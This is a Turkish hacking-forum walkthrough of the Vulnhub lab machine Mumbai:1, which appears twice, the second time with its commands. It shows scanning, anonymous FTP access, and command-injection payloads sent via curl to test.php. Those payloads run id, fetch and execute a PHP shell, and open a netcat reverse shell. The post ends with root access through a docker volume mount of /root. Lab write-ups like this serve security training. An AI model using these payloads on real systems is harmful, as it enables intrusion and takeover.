Mumbai:1 Vulnhub Walkthrough
Herkese merhaba TurkHackTeam üyeleri,
Ben Uchiha-Sasuke,
Bu konumda sizlere 'Mumbai:1 Vulnhub Walkthrough' Zafiyetli makine çözümünü anlatacağım.
Mumbai:1 Vulnhub Walkthrough
İsim: Mumbai:1 Vulnhub Walkthrough
Çıkış Tarihi: 18 Kasım 2019
Zorluk: Orta Düzey
Dosya Boyutu: 1.9 GB
Hedef: proof.txt
Seri: Mumbai
Hemen konuya geçelim,
İlk olarak zafiyetli makinemizin IP Adresini öğrenelim.
Komudumuz;
Komudumuzu yazıp Enter'leyelim.
Karşımıza böyle bir ekran geldi.
'192.168.1.58' IP'ye sahip olan makine bizim sızacağımız makine.
Şimdi IP Adresine ufak bir nmap taraması yapalım.
Komudumuz;
Enterleyelim.
Açık portları vs. bilgileri verdi.
21 FTP, 22 SSH , 80 HTTP , 3306 mysql , 8000 HTTP(nginx)
21 Portu açık. Yani FTP,
Anonim Girişe izinli.
Şimdi hemen ftp ile giriş yapmayı deniyelim.
Komudumuz;
Ardından Enter'leyelim.
Bizden Name ve Password İstiyor.
Sırasıyla bu bilgileri girelim.
Ve girişimiz sağlandı.
Bakalım içerde hangi dosyalar var.
Komudumuz;
İçerde Note adlı bir dosya olduğunu görüyoruz.
Hemen bunu alalım.
Komudumuz;
Ve Note adlı dosyamız Desktop'a geldi.
Artık FTP'den çıkış yapabiliriz.
Komudumuz;
Çıkışımız sağlandı.
Şimdi deminden Desktop'a gelen dosyaya bakalım ne varmış içinde ?
Komudumuz;
Yazıp Enter'leyelim.
Resimde'de görüldüğü gibi 'HTTP Servers running to Dockers' yazıyor.
Şimdi tarayıcımızı açalım ve IP'ye bağlı siteye girelim.
Tarayıcının arama bölümüne;
Yazıp girdik. Karşımıza yukarıdaki gibi Coming Soon yazan bir ekran çıktı.
Şimdi birde siteye 8000 (HTTP Nginx)'i ekleyip girelim.
Tarayıcımıza;
Yazıp girdik, Beyaz bir arkaplanda API Coming Here Soon! yazısı bizi karşılıyor.
Ancak burdan hiçbir ipucu vs. bulamadık.
O yüzden siteye bi dirb saldırısı yapalım.
Komudumuz;
Enter'leyelim.
Karşımıza bissürü sonuç çıktı, en önemli olarak wordpress ve drupal göze çarpıyor.
Şimdi ise belirli şeyleri arayalım.
Komudumuz;
Şimdi belirli uzantılı şeyleri arayalım.php, .txt , .py gibi.
Enter'leyelim.
Ararken test.php'yi ve keywords.py'yi buldu
Şimdi test.php'den faydalanalım![Smile :) :)](data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7)
Komudumuz;
Yazıp Enter'leyelim.
Gördüğünüz üzere bize bir link verdi. Bu şimdilik kalsın.
Biz keywords.py'ye dönelim.
Komudumuz;
Komudumuzu Yazıp Enterliyoruz.
Ardından Desktop'a keywords.py adlı bir dosya indi.
Şimdi inen dosya üstünde tarama tarzı bir işlem gerçekleştirelim.
Komudumuz;
Ve değişik bir sonuç verdi.
Şimdi test.php'ye geri dönelim.
Komudumuz;
Ardından Enter'leyelim.
Deminki gibi değişik bir sonuç verdi.
Şimdi aynı işlemi wordpress;id için yapalım.
Komudumuz;
Ardından Enter'leyelim.
Böyle bir sonuç verdi.
Son cümlede 3 apiuser ve 1 docker verdi.
Şimdi bir sonraki işleme doğru ilerleyelim.
Komudumuz;
Komudumuzu yazıp Enter'leyelim.
Gördüğünüz gibi test.php gibi barındırdıklarını bize gösterdi.
Şimdi Bir daha tarıyalım.
Komudumuz;
Enter'leyelim.
Çıktımızı verdi.
Şimdi son bir tarama daha![Smile :) :)](data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7)
Komudumuz;
Kodumuzu yazıp Enter'leyelim.
Şimdi sona doğru yaklaştık, komutlarımızı girmeye devam edelim
Ve gördüğünüz gibi proof.txt'ye ulaştık![Smile :) :)](data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7)
İsteyenler cat proof.txt yazıp içine bakabilirler![Smile :) :)](data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7)
Uchiha iyi günler diler...
Herkese merhaba TurkHackTeam üyeleri,
Ben Uchiha-Sasuke,
Bu konumda sizlere 'Mumbai:1 Vulnhub Walkthrough' Zafiyetli makine çözümünü anlatacağım.
![SRCG6a.png](https://resmim.net/f/SRCG6a.png)
Mumbai:1 Vulnhub Walkthrough
![KElkup.png](https://resmim.net/f/KElkup.png)
İsim: Mumbai:1 Vulnhub Walkthrough
Çıkış Tarihi: 18 Kasım 2019
Zorluk: Orta Düzey
Dosya Boyutu: 1.9 GB
Hedef: proof.txt
Seri: Mumbai
![giphy.gif](https://media.giphy.com/media/1TAIxQoE4tG0EfYmvt/giphy.gif)
Hemen konuya geçelim,
İlk olarak zafiyetli makinemizin IP Adresini öğrenelim.
![BGmORD.png](https://i.hizliresim.com/BGmORD.png)
Komudumuz;
Kod:
netdiscover
Komudumuzu yazıp Enter'leyelim.
![DGVOEy.png](https://i.hizliresim.com/DGVOEy.png)
Karşımıza böyle bir ekran geldi.
'192.168.1.58' IP'ye sahip olan makine bizim sızacağımız makine.
Şimdi IP Adresine ufak bir nmap taraması yapalım.
![ryB0gz.png](https://i.hizliresim.com/ryB0gz.png)
Komudumuz;
Kod:
nmap -A -p- 192.168.1.58 (IP Adresiniz Değişik Olabilir.)
Enterleyelim.
![RGLgBj.png](https://i.hizliresim.com/RGLgBj.png)
![nyVbRV.png](https://i.hizliresim.com/nyVbRV.png)
Açık portları vs. bilgileri verdi.
21 FTP, 22 SSH , 80 HTTP , 3306 mysql , 8000 HTTP(nginx)
21 Portu açık. Yani FTP,
Anonim Girişe izinli.
Şimdi hemen ftp ile giriş yapmayı deniyelim.
![dMzLZL.png](https://i.hizliresim.com/dMzLZL.png)
Komudumuz;
Kod:
ftp 192.168.1.58 (IP Adresiniz Değişiklik Gösterebilir)
Ardından Enter'leyelim.
![DGVO6z.png](https://i.hizliresim.com/DGVO6z.png)
Bizden Name ve Password İstiyor.
Kod:
name: anonymous
password: 331
Sırasıyla bu bilgileri girelim.
Ve girişimiz sağlandı.
Bakalım içerde hangi dosyalar var.
![Zng5kZ.png](https://i.hizliresim.com/Zng5kZ.png)
Komudumuz;
Kod:
ls
İçerde Note adlı bir dosya olduğunu görüyoruz.
Hemen bunu alalım.
![3gBOo2.png](https://i.hizliresim.com/3gBOo2.png)
Komudumuz;
Kod:
get Note
Ve Note adlı dosyamız Desktop'a geldi.
Artık FTP'den çıkış yapabiliriz.
![Zng5dZ.png](https://i.hizliresim.com/Zng5dZ.png)
Komudumuz;
Kod:
bye
Çıkışımız sağlandı.
Şimdi deminden Desktop'a gelen dosyaya bakalım ne varmış içinde ?
![ryB097.png](https://i.hizliresim.com/ryB097.png)
Komudumuz;
Kod:
cat Note
Yazıp Enter'leyelim.
![b9Avy8.png](https://i.hizliresim.com/b9Avy8.png)
Resimde'de görüldüğü gibi 'HTTP Servers running to Dockers' yazıyor.
Şimdi tarayıcımızı açalım ve IP'ye bağlı siteye girelim.
![OanrLD.png](https://i.hizliresim.com/OanrLD.png)
Tarayıcının arama bölümüne;
Kod:
192.168.1.58 (IP Adresine Göre Değişiklik Olabilir)
Yazıp girdik. Karşımıza yukarıdaki gibi Coming Soon yazan bir ekran çıktı.
Şimdi birde siteye 8000 (HTTP Nginx)'i ekleyip girelim.
![MR51a1.png](https://i.hizliresim.com/MR51a1.png)
Tarayıcımıza;
Kod:
192.168.1.58:8000
Yazıp girdik, Beyaz bir arkaplanda API Coming Here Soon! yazısı bizi karşılıyor.
Ancak burdan hiçbir ipucu vs. bulamadık.
O yüzden siteye bi dirb saldırısı yapalım.
![zyvG07.png](https://i.hizliresim.com/zyvG07.png)
Komudumuz;
Kod:
dirb http://192.168.1.58 (IP Adresine Göre Değişiklik Gösterebilir)
Enter'leyelim.
![jAPq6L.png](https://i.hizliresim.com/jAPq6L.png)
Karşımıza bissürü sonuç çıktı, en önemli olarak wordpress ve drupal göze çarpıyor.
Şimdi ise belirli şeyleri arayalım.
![l42QqQ.png](https://i.hizliresim.com/l42QqQ.png)
Komudumuz;
Kod:
dirb http://192.168.1.58:8000 -X .php, .txt, .py (IP Adresi Değişiklik Gösterebilir)
Şimdi belirli uzantılı şeyleri arayalım.php, .txt , .py gibi.
Enter'leyelim.
![vydaar.png](https://i.hizliresim.com/vydaar.png)
Ararken test.php'yi ve keywords.py'yi buldu
Şimdi test.php'den faydalanalım
![zyvGy4.png](https://i.hizliresim.com/zyvGy4.png)
Komudumuz;
Kod:
curl http://192.168.1.58:8000/test.php (IP Adresi Değişiklik Gösterebilir)
Yazıp Enter'leyelim.
![oyPdyR.png](https://i.hizliresim.com/oyPdyR.png)
Gördüğünüz üzere bize bir link verdi. Bu şimdilik kalsın.
Biz keywords.py'ye dönelim.
![Zng5zo.png](https://i.hizliresim.com/Zng5zo.png)
Komudumuz;
wget http://192.168.1.58:8000/keywords.py (IP Adresi Değişiklik Gösterebilir)
Komudumuzu Yazıp Enterliyoruz.
Ardından Desktop'a keywords.py adlı bir dosya indi.
![AGQO8z.png](https://i.hizliresim.com/AGQO8z.png)
Şimdi inen dosya üstünde tarama tarzı bir işlem gerçekleştirelim.
Komudumuz;
Kod:
python3 keywords.py --query http://192.168.1.58/wordpress (IP Adresi Değişiklik Gösterebilir)
Ve değişik bir sonuç verdi.
Şimdi test.php'ye geri dönelim.
![E2nOWv.png](https://i.hizliresim.com/E2nOWv.png)
Komudumuz;
Kod:
curl -d "query=http://192.168.1.58/wordpress" http://192.168.1.58:8000/test.php (IP Adresi Değişiklik Gösterebilir)
Ardından Enter'leyelim.
![zyvGLO.png](https://i.hizliresim.com/zyvGLO.png)
Deminki gibi değişik bir sonuç verdi.
Şimdi aynı işlemi wordpress;id için yapalım.
![E2nONv.png](https://i.hizliresim.com/E2nONv.png)
Komudumuz;
Kod:
curl -d "query=http://192.168.1.58/wordpress;id" http://192.168.1.58:8000/test.php (IP Adresi Değişiklik Gösterebilir)
Ardından Enter'leyelim.
![PG47z6.png](https://i.hizliresim.com/PG47z6.png)
Böyle bir sonuç verdi.
Son cümlede 3 apiuser ve 1 docker verdi.
Şimdi bir sonraki işleme doğru ilerleyelim.
![yj8Gv7.png](https://i.hizliresim.com/yj8Gv7.png)
Komudumuz;
Kod:
curl -d "query=http://192.168.1.58/wordpress;pwd;ls -la" http://192.168.1.58:8000/test.php (IP Adresi Değişiklik Gösterebilir)
Komudumuzu yazıp Enter'leyelim.
![WoAXyN.png](https://i.hizliresim.com/WoAXyN.png)
Gördüğünüz gibi test.php gibi barındırdıklarını bize gösterdi.
Şimdi Bir daha tarıyalım.
![AGQOVQ.png](https://i.hizliresim.com/AGQOVQ.png)
Komudumuz;
Kod:
curl -d "query=http://192.168.1.58/wordpress;wget http://192.168.1.58:8000/phpshell.php;ls -la" http://192.168.1.58:8000/test.php (IP Adresi Değişiklik Gösterebilir)
Enter'leyelim.
![zyvGkg.png](https://i.hizliresim.com/zyvGkg.png)
Çıktımızı verdi.
Şimdi son bir tarama daha
![BGmOQG.png](https://i.hizliresim.com/BGmOQG.png)
Komudumuz;
Kod:
curl -d "query=http://192.168.1.58/wordpress;php phpshell.php" http://192.168.1.58:8000/test.php (IP Adresi Değişiklik Gösterebilir)
Kodumuzu yazıp Enter'leyelim.
Şimdi sona doğru yaklaştık, komutlarımızı girmeye devam edelim
Kod:
nc -lvp 1234
python -c 'import pty;pty.spawn("/bin/bash")'
id
pwd
![qy1A6R.png](https://i.hizliresim.com/qy1A6R.png)
Kod:
docker run -it -v /root:/mnt/ignite ubuntu
cd /mnt
cd ignite
ls
![MR5R51.png](https://i.hizliresim.com/MR5R51.png)
Ve gördüğünüz gibi proof.txt'ye ulaştık
İsteyenler cat proof.txt yazıp içine bakabilirler
![giphy.gif](https://media.giphy.com/media/1TAIxQoE4tG0EfYmvt/giphy.gif)
Uchiha iyi günler diler...
![oKEKz1.gif](https://i.imgyukle.com/2019/09/20/oKEKz1.gif)